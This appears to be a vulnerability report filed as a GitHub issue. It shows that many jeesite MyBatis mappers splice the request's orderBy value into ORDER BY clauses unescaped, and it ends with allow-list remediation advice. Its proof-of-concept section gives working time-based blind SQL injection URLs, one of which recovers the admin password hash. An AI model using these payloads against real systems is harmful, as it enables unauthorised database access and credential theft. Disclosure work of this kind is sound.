MyBatis ORDER BY SQL injection via unescaped `${page.orderBy}` in jeesite mappers
maybe-why-not opened this issue · comments
SQL mappings that interpolate `page.orderBy` with `${...}` (MyBatis string substitution, spliced into the SQL text as-is, unlike a `#{...}` bound parameter):
jeesite\src\main\resources\templates\modules\gen\dao\mapper.xml:
106 <choose>
107 <when test="page !=null and page.orderBy != null and page.orderBy != ''">
108: ORDER BY ${"$"}{page.orderBy}
109 </when>
110 <otherwise>
...
132 <choose>
133 <when test="page !=null and page.orderBy != null and page.orderBy != ''">
134: ORDER BY ${"$"}{page.orderBy}
135 </when>
136 <otherwise>
jeesite\src\main\resources\mappings\modules\sys\UserDao.xml:
188 <choose>###
189 <when test="page !=null and page.orderBy != null and page.orderBy != ''">
190: ORDER BY ${page.orderBy}
191 </when>
192 <otherwise>
jeesite\src\main\resources\mappings\modules\gen\GenTableDao.xml:
45 <choose>###
46 <when test="page.orderBy != null and page.orderBy != ''">
47: ORDER BY ${page.orderBy}
48 </when>
49 <otherwise>
..
60 <choose>
61 <when test="page !=null and page.orderBy != null and page.orderBy != ''">
62: ORDER BY ${page.orderBy}
63 </when>
64 <otherwise>
jeesite\src\main\resources\mappings\modules\cms\ArticleDao.xml:
80 <choose>
81 <when test="page !=null and page.orderBy != null and page.orderBy != ''">
82: ORDER BY ${page.orderBy}
83 </when>
84 <otherwise>
..
98 <choose>
99 <when test="page !=null and page.orderBy != null and page.orderBy != ''">
100: ORDER BY ${page.orderBy}
101 </when>
102 <otherwise>
jeesite\src\main\resources\mappings\modules\cms\CategoryDao.xml:
90 <choose>
91 <when test="page !=null and page.orderBy != null and page.orderBy != ''">
92: ORDER BY ${page.orderBy}
93 </when>
94 <otherwise>
jeesite\src\main\resources\mappings\modules\cms\CommentDao.xml:
44 <choose>
45 <when test="page !=null and page.orderBy != null and page.orderBy != ''">
46: ORDER BY ${page.orderBy}
47 </when>
48 <otherwise>
..
62 <choose>
63 <when test="page !=null and page.orderBy != null and page.orderBy != ''">
64: ORDER BY ${page.orderBy}
65 </when>
66 <otherwise>
jeesite\src\main\resources\mappings\modules\cms\GuestbookDao.xml:
42 <choose>
43 <when test="page !=null and page.orderBy != null and page.orderBy != ''">
44: ORDER BY ${page.orderBy}
45 </when>
46 <otherwise>
..
60 <choose>
61 <when test="page !=null and page.orderBy != null and page.orderBy != ''">
62: ORDER BY ${page.orderBy}
63 </when>
64 <otherwise>
jeesite\src\main\resources\mappings\modules\cms\LinkDao.xml:
51 <choose>
52 <when test="page !=null and page.orderBy != null and page.orderBy != ''">
53: ORDER BY ${page.orderBy}
54 </when>
55 <otherwise>
..
69 <choose>
70 <when test="page !=null and page.orderBy != null and page.orderBy != ''">
71: ORDER BY ${page.orderBy}
72 </when>
73 <otherwise>
jeesite\src\main\resources\mappings\modules\cms\SiteDao.xml:
49 <choose>
50 <when test="page !=null and page.orderBy != null and page.orderBy != ''">
51: ORDER BY ${page.orderBy}
52 </when>
53 <otherwise>
..
67 <choose>
68 <when test="page !=null and page.orderBy != null and page.orderBy != ''">
69: ORDER BY ${page.orderBy}
70 </when>
71 <otherwise>
jeesite\src\main\resources\mappings\jeesite\test\TestDataChildDao.xml:
46 <choose>###
47 <when test="page !=null and page.orderBy != null and page.orderBy != ''">
48: ORDER BY ${page.orderBy}
49 </when>
50 <otherwise>
..
64 <choose>
65 <when test="page !=null and page.orderBy != null and page.orderBy != ''">
66: ORDER BY ${page.orderBy}
67 </when>
68 <otherwise>
jeesite\src\main\resources\mappings\jeesite\test\TestDataDao.xml:
67 <choose>
68 <when test="page !=null and page.orderBy != null and page.orderBy != ''">
69: ORDER BY ${page.orderBy}
70 </when>
71 <otherwise>
..
85 <choose>
86 <when test="page !=null and page.orderBy != null and page.orderBy != ''">
87: ORDER BY ${page.orderBy}
88 </when>
89 <otherwise>
jeesite\src\main\resources\mappings\jeesite\test\TestDataMainDao.xml:
58 <choose>
59 <when test="page !=null and page.orderBy != null and page.orderBy != ''">
60: ORDER BY ${page.orderBy}
61 </when>
62 <otherwise>
..
76 <choose>
77 <when test="page !=null and page.orderBy != null and page.orderBy != ''">
78: ORDER BY ${page.orderBy}
79 </when>
80 <otherwise>
Affected request mappings (controllers that populate `page.orderBy` from the request `orderBy` parameter and reach the mappers above):
sys/user/list
gen/genTable/list
gen/genTable/form
gen/genTable/save
gen/genScheme/form
gen/genScheme/save
...
Proof of concept: time-based blind SQL injection (MySQL `sleep()`), the request takes measurably longer when the condition is false
url:http://192.168.163.1:8088/jeesite_war/a/sys/user/list?orderBy=if(database()!=0x6a656573697465,1,sleep(0.3))
Extracting the admin password hash: the same technique compares `cu.password` (the password column of the user table referenced by the list query) against a guessed hex value, so the hash can be recovered one comparison at a time
url:http://192.168.163.1:8088/jeesite_war/a/sys/user/list?orderBy=if(cu.password!=0x3032613366303737326663636139663431356164633939303733346234356336663035396337643333656532383336326334383532303332,1,sleep(3))&pageSize=1&id=1
Remediation suggestion
Keep the ORDER BY filtering separate from the general input filter: validate `orderBy` against an anchored allow-list (e.g. `^[a-z0-9_]+$`, extended only as far as needed for `.`, `,` and `asc`/`desc`), or better, map the requested value onto a fixed list of known column names, and reserve the deny-list for the general filter. Note that switching to `#{page.orderBy}` is not a fix here: a bound parameter in ORDER BY becomes a string literal, not a column reference, so allow-listing is the only option for this clause. Every mapper listed above should be covered, since each one interpolates `page.orderBy` the same way.